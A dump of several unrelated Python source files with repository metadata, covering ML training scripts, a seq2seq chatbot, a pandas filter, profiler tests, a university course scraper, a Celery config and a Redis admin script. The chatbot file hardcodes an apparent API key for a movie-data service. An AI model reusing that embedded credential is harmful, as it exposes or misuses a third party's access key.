] | permissive | afcarl/google-research | 51c7b70d176c0d70a5ee31ea1d87590f3d6c6f42 | 320a49f768cea27200044c0d12f394aa6c795feb | refs/heads/master | 2021-12-02T18:36:03.760434 | 2021-09-30T20:59:01 | 2021-09-30T21:07:02 | 156,725,548 | 1 | 0 | Apache-2.0 | 2018-11-08T15:13:53 | 2018-11-08T15:13:52 | null | UTF-8 | Python | false | false | 3,559 | py | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Train an agent.
"""
import os
from absl import app
from absl import flags
from dopamine.discrete_domains import run_experiment
import tensorflow.compat.v1 as tf
from experience_replay import run_experience_replay_experiment
# Command-line flags configuring the experiment.
flags.DEFINE_string('base_dir', None,
                    'Base directory to host all required sub-directories.')
flags.DEFINE_multi_string(
    'gin_files', [], 'List of paths to gin configuration files (e.g.'
    '"third_party/py/dopamine/agents/dqn/dqn.gin").')
flags.DEFINE_multi_string(
    'gin_bindings', [],
    'Gin bindings to override the values set in the config files '
    '(e.g. "DQNAgent.epsilon_train=0.1",'
    ' "create_atari_environment.game_name="Pong"").')
# NOTE(review): only 'continuous_train_and_eval' is accepted by
# create_runner() below, despite the wider set listed in this help string.
flags.DEFINE_string(
    'schedule', 'continuous_train_and_eval',
    'The schedule with which to run the experiment and choose an appropriate '
    'Runner. Supported choices are '
    '{continuous_train, eval, continuous_train_and_eval}.')
FLAGS = flags.FLAGS
def create_runner(base_dir, create_agent_fn,
                  schedule='continuous_train_and_eval'):
  """Creates an experiment Runner.

  TODO(b/): Figure out the right idiom to create a Runner. The current mechanism
  of using a number of flags will not scale and is not elegant.

  Args:
    base_dir: Base directory for hosting all subdirectories.
    create_agent_fn: A function that takes as args a Tensorflow session and a
      Gym Atari 2600 environment, and returns an agent.
    schedule: string, which type of Runner to use. Only
      'continuous_train_and_eval' is currently supported; any other value
      raises ValueError.

  Returns:
    runner: A `run_experiment.Runner` like object.

  Raises:
    ValueError: When an unknown schedule is encountered.
  """
  assert base_dir is not None
  # Continuously runs training and eval till max num_iterations is hit.
  if schedule == 'continuous_train_and_eval':
    return run_experience_replay_experiment.ElephantRunner(
        base_dir, create_agent_fn)
  else:
    raise ValueError('Unknown schedule: {}'.format(schedule))
def launch_experiment(create_runner_fn, create_agent_fn):
  """Loads the gin configuration and runs the configured experiment.

  Args:
    create_runner_fn: A function that takes as args a base directory and a
      function for creating an agent and returns a `Runner` like object.
    create_agent_fn: A function that takes as args a Tensorflow session and a
      Gym environment, and returns an agent.
  """
  run_experiment.load_gin_configs(FLAGS.gin_files, FLAGS.gin_bindings)
  create_runner_fn(
      FLAGS.base_dir, create_agent_fn,
      schedule=FLAGS.schedule).run_experiment()
def main(unused_argv):
  """This main function acts as a wrapper around a gin-configurable experiment.

  Args:
    unused_argv: Arguments (unused).
  """
  tf.logging.set_verbosity(tf.logging.INFO)
  launch_experiment(create_runner,
                    run_experience_replay_experiment.create_agent)
if __name__ == '__main__':
  # 'base_dir' must be supplied on the command line before the app runs.
  flags.mark_flag_as_required('base_dir')
  app.run(main)
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
f58c4b1e9c6366deb20e2f21faa02caffaaed02d | 0d4ed26eb44d54238d86eff91f7b45ab62609161 | /arakat-core/pipeline_generator/preprocessing/graph/ParentChecker.py | 5051302aa3e4fa7275085426d9e23e4b27e0a954 | [
"Apache-2.0"
] | permissive | obalcik/arakat | c8583d8ce4d471df3cf3d9ef4a604307b75c30f5 | 7a8a30708bf8f74de7384c290c035a3a65d3ba47 | refs/heads/master | 2020-03-29T21:36:34.118850 | 2018-11-28T12:18:04 | 2018-11-28T12:18:04 | 150,376,678 | 1 | 0 | Apache-2.0 | 2018-09-26T06:10:08 | 2018-09-26T06:10:08 | null | UTF-8 | Python | false | false | 3,103 | py | from domain.HighLevelNodeTypes import HighLevelNodeTypes
from domain.ErrorTypes import ErrorTypes
from domain.SpecialCases import SpecialCases
def check_parents(cur_nodes, edge_info, nodes):
    """Validate the parents of the two endpoint nodes of an edge.

    Args:
        cur_nodes: The two endpoint node dicts of the edge being checked.
        edge_info: Dict describing the edge; its "type" drives special cases.
        nodes: Mapping from node id to node dict, used to look up parents.

    Returns:
        A dict always carrying "error"; on success it also contains parent
        info ("parent_type", and for inner nodes "parent_id"/"meta_parent_id")
        or a "special_case" payload for crossing model edges.
    """
    parent1 = cur_nodes[0]["parent"]
    parent2 = cur_nodes[1]["parent"]
    # No nodes (except Task nodes) can have a None parent.
    if(parent1 is None and parent2 is None):
        # Edge between task
        return {"parent_type": HighLevelNodeTypes.NO_NODE, "error": ErrorTypes.NO_ERROR}
    elif(parent1 is None and parent2 is not None):
        # Error: since task node cannot be connected with inner nodes (non-task nodes)
        # Error: tasks can't include other tasks as inner nodes
        if(nodes[parent2]["node_type"] == HighLevelNodeTypes.TASK_NODE.value):
            return {"error": ErrorTypes.TASK_INSIDE_TASK_ERROR}
        return {"error": ErrorTypes.TASK_TO_INNER_EDGE_ERROR}
    elif(parent1 is not None and parent2 is None):
        # Mirror of the case above with the endpoints swapped.
        if (nodes[parent1]["node_type"] == HighLevelNodeTypes.TASK_NODE.value):
            return {"error": ErrorTypes.TASK_INSIDE_TASK_ERROR}
        return {"error": ErrorTypes.TASK_TO_INNER_EDGE_ERROR}
    else:
        # Both node have parents.
        # Nodes with an edge must have same parents (No Cross Edges).
        # -> No edges between inner nodes of different tasks
        # -> No edges between inner nodes and nodes under pipeline nodes/cv nodes
        # Determine the parent type: Task Node, Pipeline Node or CV Node...
        # Special nodes:
        # Only allow crossing edges to pipelines from an inner node iff edge carries model
        if(parent1 == parent2):
            # Siblings of same parents, satisfies conditions above...
            # Meta-parent will be used when the parent is pipeline node or cv node.
            return {"parent_id": parent1, "parent_type": HighLevelNodeTypes(nodes[parent1]["node_type"]), "meta_parent_id": nodes[parent1]["parent"], "error": ErrorTypes.NO_ERROR}
        else:
            return __check_special_cases(cur_nodes, edge_info, [nodes[parent1], nodes[parent2]])
def __check_special_cases(cur_nodes, edge_info, parents):
    # Single dispatch point for edges whose endpoints have different parents;
    # the only special case currently allowed is a model edge crossing from a
    # task into a pipeline.
    return __is_model_edge_crossing_into_pipeline(cur_nodes, edge_info, parents)
def __is_model_edge_crossing_into_pipeline(cur_nodes, edge_info, parents):
if(parents[0]["node_type"] == HighLevelNodeTypes.TASK_NODE.value and parents[1]["node_type"] == HighLevelNodeTypes.PIPELINE_NODE.value):
if(edge_info["type"]=="model"):
edge_id=cur_nodes[0]["id"] + "-" + cur_nodes[1]["id"]
return {"special_case": {"name": SpecialCases.CROSSING_MODEL_EDGE_TO_PIPELINE, "task_id": parents[0]["id"], "pipeline_id": parents[1]["id"], "model_source_id": cur_nodes[0]["id"], "model_holder_id": cur_nodes[1]["id"], "edge_info": edge_info}, "error": ErrorTypes.NO_ERROR}
else:
# Might add a better name for the error
return {"error": ErrorTypes.NOT_SIBLING_ERROR} | [
"erelcan89@gmail.com"
] | erelcan89@gmail.com |
a130e7cbc5096fc05d24b77c1bb957b1e492c07d | f466373b13ae038770990331e0193133d0729caf | /movie_chatbot_server_ver/movie/my_chatbot_textcnn2/Rnn_chatbot/chat.py | 95ab9f0f0589abcc0a1e3a49e074b82312c434ed | [] | no_license | kih1024/chatbot | 92f8a321996707a123bcb90ba10bfd318aabea84 | e2f7741d17e1042c74966dfebc5628a4f4020250 | refs/heads/master | 2018-09-06T16:41:46.515759 | 2018-06-04T15:53:47 | 2018-06-04T15:53:47 | 115,597,558 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,653 | py | import tensorflow as tf
import numpy as np
import math
import sys
from Rnn_chatbot.config import FLAGS
from Rnn_chatbot.model import Seq2Seq
from Rnn_chatbot.dialog import Dialog
import xml.etree.ElementTree as ET
import urllib.request
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
url = "http://www.kobis.or.kr/kobisopenapi/webservice/rest/movie/searchMovieList.xml?key="
key = "2a83ee607d889ae32fca2cf9edbbe573"
url = url + key
class ChatBot:
    """Seq2Seq chatbot: loads the vocabulary, rebuilds the trained
    encoder/decoder RNN graph, and restores its weights from a checkpoint
    so that replies can be decoded for input sentences."""
    def __init__(self, voc_path, vector_path, train_dir):
        # Build the dialog helper and load the vocabulary files
        # (per the original notes: chat.voc / word_embedding.voc).
        self.dialog = Dialog()
        self.dialog.load_vocab(voc_path, vector_path)
        # Build the encoder/decoder RNN graph sized to the vocabulary.
        self.model = Seq2Seq(self.dialog.vocab_size)
        self.sess = tf.Session()
        tf.reset_default_graph()
        # Restore the trained variables from the latest checkpoint in train_dir.
        ckpt = tf.train.get_checkpoint_state(train_dir)
        self.model.saver.restore(self.sess, ckpt.model_checkpoint_path)
    def run(self, sentence):
        """Answer `sentence` first, then keep answering lines read from
        stdin until an empty line / EOF is reached."""
        line = sentence
        while line:
            print(self.get_replay(line.strip()))
            sys.stdout.write("\n> ")
            sys.stdout.flush()
            line = sys.stdin.readline()
    def decode(self, enc_input, dec_input):
        """Pad / one-hot the token-id sequences and run one prediction step."""
        if type(dec_input) is np.ndarray:
            dec_input = dec_input.tolist()
        # TODO (original note): use per-length buckets as in Google's
        # implementation. Here the encoder input length is simply rounded
        # up to the next multiple of 5.
        if(len(enc_input) % 5 != 0):
            input_len = int(((len(enc_input)//5)+1)*5)
        else:
            input_len = len(enc_input)
        # transform() pads the sequences and builds the one-hot vectors.
        enc_input, dec_input, _ = self.dialog.transform(enc_input, dec_input,
                                                        input_len,
                                                        FLAGS.max_decode_len)
        return self.model.predict(self.sess, [enc_input], [dec_input])
    def get_replay(self, msg):
        """Greedily decode a reply for the input sentence `msg`.

        Tokens predicted so far are fed back as decoder input, one token per
        decode() call, up to FLAGS.max_decode_len tokens.
        """
        # Tokenize and map tokens to vocabulary ids (out-of-vocabulary
        # tokens become the unknown id).
        enc_input = self.dialog.tokenizer(msg, False)
        enc_input = self.dialog.tokens_to_ids(enc_input)
        dec_input = []
        # Original note: building the output sequence incrementally from the
        # final outputs, instead of inside the Seq2Seq RNN cell itself.
        curr_seq = 0
        for i in range(FLAGS.max_decode_len):
            outputs = self.decode(enc_input, dec_input)
            if self.dialog.is_eos(outputs[0][curr_seq]):
                # End-of-sequence token: the reply is complete.
                break
            elif self.dialog.is_defined(outputs[0][curr_seq]) is not True:
                # Skip pre-defined control tokens; keep real words only.
                dec_input.append(outputs[0][curr_seq])
                curr_seq += 1
        reply = self.dialog.decode([dec_input], True)
        return reply
def main(_, sentence):
    """Entry point: build the ChatBot from FLAGS paths and run it on `sentence`.

    NOTE(review): tf.app.run() below invokes main(argv) with a single
    argument, which does not match this two-argument signature -- confirm
    how this module is actually launched.
    """
    print("깨어나는 중 입니다. 잠시만 기다려주세요...\n")
    chatbot = ChatBot(FLAGS.voc_path, FLAGS.vec_path, FLAGS.train_dir)
    chatbot.run(sentence)
if __name__ == "__main__":
    #tf.reset_default_graph()
    tf.app.run()
| [
"rladlsgh654@naver.com"
] | rladlsgh654@naver.com |
68a8fa89f93202a0a70bcd74a4cb00d6cd3443ce | 6cbaade56c5db347d1be9a3422a69af52df39b97 | /python_workspace/3_bigdata/02_Standardization_Analysis/1_CSV/3pandas_value_meets_condition.py | 7d6e3720622a55a884ddfd88fa1510ccd7e19c49 | [] | no_license | baewonje/iot_bigdata_- | b54e3772f64b9695efee8632183590628b679e11 | 2ce1af67d2f05abeb2ecd442b7299f349bdb9753 | refs/heads/master | 2020-09-06T09:53:53.018320 | 2019-12-06T08:19:33 | 2019-12-06T08:19:33 | 220,390,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 500 | py | # 목적: pandas 문법으로 특정 행을 필터링하기
import pandas as pd
import sys
input_file = sys.argv[1]
output_file = sys.argv[2]
data_frame = pd.read_csv(input_file)
data_frame['Cost'] = data_frame['Cost'].str.strip('$').astype(float)
data_frame_value_meets_condition = data_frame.loc[(data_frame['Supplier Name'].str.contains('Z')) | (data_frame['Cost'] > 600.0), :]
# loc 내부에 ,를 생략하면 에러발생
data_frame_value_meets_condition.to_csv(output_file, index=False ) | [
"50129576+baewonje@users.noreply.github.com"
] | 50129576+baewonje@users.noreply.github.com |
fdaf7031d6c27c7b70b0ded64c5e71e167f1d4ed | 8042163dbac5ddf47f078b4d14f4eb6fe1da030d | /tensorflow/python/profiler/profiler_v2_test.py | 50d29c0532f075d553911327a73af863fb9f1cff | [
"Apache-2.0"
] | permissive | AITutorials/tensorflow | 4513de8db4e9bb74b784f5ba865ef8a573b9efc1 | 6bee0d45f8228f2498f53bd6dec0a691f53b3c7b | refs/heads/master | 2022-07-29T13:37:23.749388 | 2020-06-11T17:47:26 | 2020-06-11T17:57:06 | 271,615,051 | 3 | 0 | Apache-2.0 | 2020-06-11T18:07:11 | 2020-06-11T18:07:10 | null | UTF-8 | Python | false | false | 4,426 | py | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf 2.x profiler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import socket
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.platform import gfile
from tensorflow.python.profiler import profiler_v2 as profiler
from tensorflow.python.profiler import traceme
class ProfilerTest(test_util.TensorFlowTestCase):
  """Tests for the TF 2.x profiler start/stop API and its output files."""
  def test_profile_exceptions(self):
    """Double start, stop without start, and a bad logdir must all raise."""
    logdir = self.get_temp_dir()
    profiler.start(logdir)
    # Starting a second session while one is active is an error.
    with self.assertRaises(errors.AlreadyExistsError):
      profiler.start(logdir)
    profiler.stop()
    # Stopping when no profiler is running is an error.
    with self.assertRaises(errors.UnavailableError):
      profiler.stop()
    # Test with a bad logdir, and it correctly raises exception and deletes
    # profiler.
    # pylint: disable=anomalous-backslash-in-string
    profiler.start('/\/\/:123')
    # pylint: enable=anomalous-backslash-in-string
    with self.assertRaises(Exception):
      profiler.stop()
    # A failed session must not block starting a fresh one.
    profiler.start(logdir)
    profiler.stop()
  def test_save_profile(self):
    """Profiling a tiny computation writes the expected set of tool files."""
    logdir = self.get_temp_dir()
    profiler.start(logdir)
    with traceme.TraceMe('three_times_five'):
      three = constant_op.constant(3)
      five = constant_op.constant(5)
      product = three * five
      self.assertAllEqual(15, product)
    profiler.stop()
    file_list = gfile.ListDirectory(logdir)
    self.assertEqual(len(file_list), 2)
    # logdir contains the 'plugins' directory plus a '.profile-empty' marker.
    for file_name in gfile.ListDirectory(logdir):
      if gfile.IsDirectory(os.path.join(logdir, file_name)):
        self.assertEqual(file_name, 'plugins')
      else:
        self.assertTrue(file_name.endswith('.profile-empty'))
    profile_dir = os.path.join(logdir, 'plugins', 'profile')
    run = gfile.ListDirectory(profile_dir)[0]
    hostname = socket.gethostname()
    # Each profiling tool writes one file named '<host>.<tool>.<ext>'.
    overview_page = os.path.join(profile_dir, run,
                                 hostname + '.overview_page.pb')
    self.assertTrue(gfile.Exists(overview_page))
    input_pipeline = os.path.join(profile_dir, run,
                                  hostname + '.input_pipeline.pb')
    self.assertTrue(gfile.Exists(input_pipeline))
    tensorflow_stats = os.path.join(profile_dir, run,
                                    hostname + '.tensorflow_stats.pb')
    self.assertTrue(gfile.Exists(tensorflow_stats))
    kernel_stats = os.path.join(profile_dir, run, hostname + '.kernel_stats.pb')
    self.assertTrue(gfile.Exists(kernel_stats))
    trace_file = os.path.join(profile_dir, run, hostname + '.trace.json.gz')
    self.assertTrue(gfile.Exists(trace_file))
  def test_profile_with_options(self):
    """start() accepts ProfilerOptions and still produces output files."""
    logdir = self.get_temp_dir()
    options = profiler.ProfilerOptions(
        host_tracer_level=3, python_tracer_level=1)
    profiler.start(logdir, options)
    with traceme.TraceMe('three_times_five'):
      three = constant_op.constant(3)
      five = constant_op.constant(5)
      product = three * five
      self.assertAllEqual(15, product)
    profiler.stop()
    file_list = gfile.ListDirectory(logdir)
    self.assertEqual(len(file_list), 2)
  def test_context_manager_with_options(self):
    """The Profile context manager mirrors start(options) / stop()."""
    logdir = self.get_temp_dir()
    options = profiler.ProfilerOptions(
        host_tracer_level=3, python_tracer_level=1)
    with profiler.Profile(logdir, options):
      with traceme.TraceMe('three_times_five'):
        three = constant_op.constant(3)
        five = constant_op.constant(5)
        product = three * five
        self.assertAllEqual(15, product)
    file_list = gfile.ListDirectory(logdir)
    self.assertEqual(len(file_list), 2)
if __name__ == '__main__':
test.main()
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
0a3ce7bc94322d2939e3bc61f528b8c73ede0326 | 0e79ab62d4e433accb7ba29a7145257c4bbba346 | /model/train_interact_tpu.py | c82ec0281216a640ac8595aa3a44e8002b56184e | [
"MIT"
] | permissive | zeta1999/piglet | 76576fcbd72cba2b7a8e0964b9a984f0cb89d827 | 41fb35a3606415deabb47541e59d9d286c398350 | refs/heads/main | 2023-05-11T04:20:28.684510 | 2021-06-01T00:54:22 | 2021-06-01T00:54:22 | 373,201,430 | 0 | 1 | MIT | 2021-06-02T14:41:05 | 2021-06-02T14:41:04 | null | UTF-8 | Python | false | false | 845 | py | """ Training script! """
import sys
sys.path.append('../')
import tensorflow as tf
from model.neat_config import NeatConfig
from model.interact.modeling import model_fn_builder
from model.interact.dataloader import input_fn_builder
config = NeatConfig.from_args("Train detector script", default_config_file='interact/configs/default_tpu.yaml')
model_fn = model_fn_builder(config)
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=config.device['use_tpu'],
model_fn=model_fn,
config=config.device['tpu_run_config'],
train_batch_size=config.device['train_batch_size'],
eval_batch_size=config.device['val_batch_size'],
predict_batch_size=config.device['val_batch_size'],
# params={},
)
estimator.train(input_fn=input_fn_builder(config, is_training=True),
max_steps=config.optimizer['num_train_steps']) | [
"rowanz@cs.washington.edu"
] | rowanz@cs.washington.edu |
304e838e3c7304f8a3cada5e5202249be9c5c479 | a8d68074db5c2b2697650ed0281979d3e00cf5a8 | /Nyspider/duapp2.drexel.edu/TMS.py | 5938794401c1348b9eb96c9578809eba807074c7 | [] | no_license | 15807857476/bogdata-2 | 9595609ea2ae5ae0a48c511f911df2498456467e | 1934cdfa234b77ca91e349b84688db113ff39e8c | refs/heads/master | 2023-05-26T19:10:18.439269 | 2019-05-24T02:50:41 | 2019-05-24T02:50:41 | 188,327,526 | 3 | 1 | null | 2023-05-22T21:37:27 | 2019-05-24T00:53:28 | Python | UTF-8 | Python | false | false | 6,277 | py | #coding:utf-8
import requests
from bs4 import BeautifulSoup
import threading
import re
import os
import xlwt3
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'}
def Get_Quarter():
    """Fetch the TMS home page and map each quarter label to its absolute URL."""
    # Keep retrying the request until it succeeds (unbounded, as before).
    while True:
        try:
            page = requests.get('https://duapp2.drexel.edu/webtms_du/app?page=Home&service=page', headers=headers, timeout=30).text
            break
        except:
            continue
    panels = BeautifulSoup(page, 'lxml').find_all('table', attrs={'class': 'termPanel'})
    quarter = {}
    # The page carries exactly two term panels; collect the links of both.
    for anchor in panels[0].find_all('a') + panels[1].find_all('a'):
        quarter[anchor.get_text()] = 'https://duapp2.drexel.edu' + anchor.get('href')
    return quarter
def Get_College(url):
    """Scrape the quarter page at `url` and map college name to absolute URL."""
    # Keep retrying the request until it succeeds (unbounded, as before).
    while True:
        try:
            page = requests.get(url, headers=headers, timeout=30).text
            break
        except:
            continue
    anchors = BeautifulSoup(page, 'lxml').find('div', id='sideLeft').find_all('a')
    return {anchor.get_text(): 'https://duapp2.drexel.edu' + anchor.get('href')
            for anchor in anchors}
def Get_subjects(url):
    """Scrape a college page and map each subject name to its absolute URL."""
    # Keep retrying the request until it succeeds (unbounded, as before).
    while True:
        try:
            page = requests.get(url, headers=headers, timeout=30).text
            break
        except:
            continue
    anchors = BeautifulSoup(page, 'lxml').find('table', attrs={'class': 'collegePanel'}).find_all('a')
    return {anchor.get_text(): 'https://duapp2.drexel.edu' + anchor.get('href')
            for anchor in anchors}
class CourseInfor(threading.Thread):
    """Worker thread that downloads one subject page and scrapes every course
    listed on it (plus each course's detail page) into dicts stored in
    `self.course_list`."""
    def __init__(self,url,name):
        super(CourseInfor,self).__init__()
        self.url=url
        self.name=name
    def run(self):
        # Retry the subject page download until it succeeds.
        statue=True
        while statue:
            try:
                html=requests.get(self.url,headers=headers,timeout=30).text
                statue=False
            except:
                continue
        # Course rows live in the centered table; skip the first and last rows.
        table=BeautifulSoup(html,'lxml').find('td',attrs={'align':'center'}).find('table').find_all('tr')
        self.course_list=[]
        courses=[]
        for item in table[1:-1]:
            course=self.subject_parser(item)
            if course==False:
                continue
            courses.append(course)
        # Enrich every course dict with the fields of its detail page.
        for course in courses:
            course=self.course_parser(course)
            self.course_list.append(course)
        print('------'+self.name+'--OK')
    def course_parser(self,course):
        """Download the detail page at course['url'] and fill in its fields."""
        # Retry the detail page download until it succeeds.
        statue=True
        while statue:
            try:
                html=requests.get(course['url'],headers=headers,timeout=30).text
                statue=False
            except:
                continue
        soup=BeautifulSoup(html,'lxml').find('table',attrs={'align':'center','valign':'top'})
        baseInforTable=soup.find('td',attrs={'align':'left'}).find_all('td',attrs={'align':'center'})
        trs=baseInforTable[0].find_all('tr')
        # Field names in the order they appear in the detail table.
        lists=['SubjectCode','CourseNumber','Section','Credits','Title','Campus','Instructors','Instruction_Type','Instruction_Method','Max_Enroll','Enroll','Section_Comments']
        for num in range(len(lists)):
            try:
                course[lists[num]]=trs[num+1].find_all('td')[1].get_text()
            except:
                course[lists[num]]='--'
        table=baseInforTable[1].find('tr',attrs={'class':'even'}).find_all('td')
        course['Building']=table[-2].get_text()
        course['Room']=table[-1].get_text()
        subjectInforText=soup.find('td',attrs={'align':'center','valign':'top'}).get_text()
        # Regexes extracting the free-text sections between known headings;
        # missing sections fall back to '--'.
        reText={'College':'College:([\s\S]*)Department','Restrictions':'Restrictions:([\s\S]*)Co-Requisites','Co-Requisites':'Co-Requisites:([\s\S]*)Pre-Requisites','Pre-Requisites':'Pre-Requisites:([\s\S]*)Repeat Status','Repeat Status':'Repeat Status:([\s\S]*)'}
        for key in reText:
            try:
                course[key]=re.findall(reText[key],subjectInforText)[0]
            except:
                course[key]='--'
        return course
    def subject_parser(self,item):
        """Extract url / CRN / Times from one course row; return False when the
        row carries no link (i.e. it is not a course row)."""
        course={}
        try:
            url='https://duapp2.drexel.edu'+item.find('a').get('href')
        except:
            return False
        course['url']=url
        course['CRN']=item.find('a').get_text()
        course['Times']=item.find('table').get_text()
        return course
def Get_Course(Quarter,college,subjects):
    """Scrape every subject of `college` concurrently and write all collected
    courses to '<Quarter>/<college>.xls' (one sheet, one row per course)."""
    print(Quarter+'--'+college+'--Start')
    excel=xlwt3.Workbook()
    threadings=[]
    # One CourseInfor scraper thread per subject.
    for subject in subjects:
        work=CourseInfor(subjects[subject], subject)
        threadings.append(work)
    for work in threadings:
        work.setDaemon(True)
        work.start()
    for work in threadings:
        work.join()
    sheet=excel.add_sheet(college)
    count=0
    # Output column order; keys must match those filled by CourseInfor.
    lists=['SubjectCode','CourseNumber','CRN','Section','Credits','Times','Title','Campus','Instructors','Instruction_Type'
    ,'Instruction_Method','Max_Enroll','Enroll','Section_Comments','Building','Room','College','Restrictions','Co-Requisites','Pre-Requisites','Repeat Status','url']
    for work in threadings:
        for course in work.course_list:
            for num in range(len(lists)):
                sheet.write(count,num,course[lists[num]])
            count+=1
    print(Quarter+'--'+college+'--OK')
    excel.save(Quarter+'/'+college+'.xls')
def main():
    """Crawl every quarter: create a per-quarter directory and spawn one
    Get_Course thread per college of that quarter."""
    quarter=Get_Quarter()
    for key in quarter:
        colleges=Get_College(quarter[key])
        try:
            os.mkdir(key)
        except:
            print('--')  # mkdir failed -- likely the directory already exists
        # NOTE(review): this workbook is never used here; each Get_Course
        # call creates its own Workbook.
        excel=xlwt3.Workbook()
        threadings=[]
        for college in colleges:
            subjects=Get_subjects(colleges[college])
            work=threading.Thread(target=Get_Course,args=(key, college, subjects))
            threadings.append(work)
        for work in threadings:
            work.setDaemon(True)
            work.start()
        for work in threadings:
            work.join()
        print('----------'+key+'--OK----------')
# Kick off the crawl when the module is executed.
main()
main()
| [
"2397955090@qq.com"
] | 2397955090@qq.com |
139bab4db8371e55144c6a767edd8121e9e1726d | 817f7dfb035af90b4c7f810c72eb7b407ea28c99 | /pingdumb/taskapp/celery.py | 7b13583c61674dfea5219ebd72f04285f69c7100 | [
"MIT"
] | permissive | rubythonode/pingdumb-django | bd7e361a7d6886db81d9bdad78ef62d375ad768a | 750a26f7c55eb176f6fd0f5b655751ee2d114d9e | refs/heads/master | 2021-01-12T01:51:18.192362 | 2016-12-14T04:50:42 | 2016-12-14T04:50:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,110 | py |
from __future__ import absolute_import
import os
from celery import Celery
from django.apps import apps, AppConfig
from django.conf import settings
if not settings.configured:
    # set the default Django settings module for the 'celery' program.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local') # pragma: no cover
# Module-level Celery application; configured in CeleryConfig.ready().
app = Celery('pingdumb')
class CeleryConfig(AppConfig):
    # Django AppConfig that wires the module-level Celery app to the Django
    # settings and, when configured, installs Raven/Opbeat error reporting.
    name = 'pingdumb.taskapp'
    verbose_name = 'Celery Config'
    def ready(self):
        """Configure Celery from Django settings, autodiscover task modules of
        every installed app, and register optional error-reporting hooks."""
        # Using a string here means the worker will not have to
        # pickle the object when using Windows.
        app.config_from_object('django.conf:settings')
        installed_apps = [app_config.name for app_config in apps.get_app_configs()]
        app.autodiscover_tasks(lambda: installed_apps, force=True)
        if hasattr(settings, 'RAVEN_CONFIG'):
            # Celery signal registration (Sentry via Raven); imported lazily so
            # the dependency is only needed when RAVEN_CONFIG is set.
            from raven import Client as RavenClient
            from raven.contrib.celery import register_signal as raven_register_signal
            from raven.contrib.celery import register_logger_signal as raven_register_logger_signal
            raven_client = RavenClient(dsn=settings.RAVEN_CONFIG['DSN'])
            raven_register_logger_signal(raven_client)
            raven_register_signal(raven_client)
        if hasattr(settings, 'OPBEAT'):
            # Opbeat integration, likewise imported only when configured.
            from opbeat.contrib.django.models import client as opbeat_client
            from opbeat.contrib.django.models import logger as opbeat_logger
            from opbeat.contrib.django.models import register_handlers as opbeat_register_handlers
            from opbeat.contrib.celery import register_signal as opbeat_register_signal
            try:
                opbeat_register_signal(opbeat_client)
            except Exception as e:
                opbeat_logger.exception('Failed installing celery hook: %s' % e)
            if 'opbeat.contrib.django' in settings.INSTALLED_APPS:
                opbeat_register_handlers()
opbeat_register_handlers()
@app.task(bind=True)
def debug_task(self):
    """Diagnostic task: print the Celery request context of the current run."""
    print('Request: {0!r}'.format(self.request))  # pragma: no cover
| [
"chm073@gmail.com"
] | chm073@gmail.com |
0eca868fb731e2726e52062354a6937d43dade2f | cc2bb9ccc66783ac7d37454e4784df5e4a2d80f4 | /close_server_one.py | 34b036b30e1c44c412f1356dfc39352cae3581da | [] | no_license | ronnyzh/Tornado_Server | f308b7e9c2112167b04cbe324e37b1f891999187 | 42112d39e4dea128d059dbfa53c410f3774dc4b1 | refs/heads/master | 2021-05-22T22:10:26.694262 | 2020-04-04T23:39:14 | 2020-04-04T23:39:14 | 253,118,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | # -*- coding:utf-8 -*-
# !/bin/python
"""
Author: ronnyzh
Date: 2019/11/15
Revision: 1.0.0
Description: Description
"""
from model.model_redis import getInst
from define.define_redis_key import *
IP = '192.168.50.2'
PORT = '9797'
if __name__ == '__main__':
    # Push a 'closeServer' command onto the Redis order list keyed by the
    # target server's ip:port (Key_Server_Order). Presumably the server at
    # IP:PORT consumes this list and shuts down -- confirm against the
    # server-side consumer.
    redis = getInst()
    ipKey = Key_Server_Order % ('%s:%s' % (IP, PORT))
    redis.lpush(ipKey, 'closeServer')
| [
"ronnyzh@yeah.net"
] | ronnyzh@yeah.net |
c336b550745a3945d4d397f07f31e0af46fe95d7 | 8517c5849cec02cfd52d5a20d8c5468227f60c0d | /kozmic/repos/views.py | 3504ff09546983cc581849ca6a165f7e6b3613e0 | [] | no_license | aromanovich/kozmic-ci | 87475a27c3b47f0e4f226aef9856b3f39ed911e5 | 368ceb992b7b9b6ceb099570f9291655cad9e96c | refs/heads/master | 2021-01-19T02:00:55.573742 | 2016-06-14T04:45:10 | 2016-06-14T04:45:10 | 14,984,166 | 26 | 6 | null | 2016-06-14T04:45:10 | 2013-12-06T14:03:31 | Python | UTF-8 | Python | false | false | 4,622 | py | import datetime
import logging
import collections
from flask import (current_app, flash, request, render_template, redirect,
url_for, abort)
from flask.ext.login import current_user
from kozmic import db
from kozmic.models import User, Organization, Project, DeployKey
from . import bp
